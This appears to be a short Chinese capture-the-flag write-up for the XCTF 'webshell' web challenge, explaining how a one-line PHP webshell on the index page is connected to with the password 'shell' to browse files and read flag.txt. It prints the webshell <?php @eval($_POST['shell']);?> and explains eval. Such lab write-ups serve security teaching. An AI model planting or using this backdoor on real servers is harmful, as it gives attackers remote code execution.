当前位置: 代码迷 >> 综合 >> 攻防世界,Web:webshell
  详细解决方案

攻防世界,Web:webshell

热度:72   发布时间:2023-12-05 19:13:12.0

1.解题过程:

(1)

进入场景,根据题目中的提示知道主页index上面的话为一句话木马

典型的一句话木马

 

shell即连接密码

 连接后就可以看到服务器的文件了

打开flag.txt得到flag

2.知识点:

(1)<?php @eval($_POST['shell']);?>

                 作用:执行一句话木马,可以从客户端连接服务器,可以进行浏览网站结构等操作

(2)eval函数:将接受的字符串当做代码执行

(3)webshell( 通过服务器开放的端口获取服务器的(某种)权限 的种类:

         国内常用小马、大马、一句话木马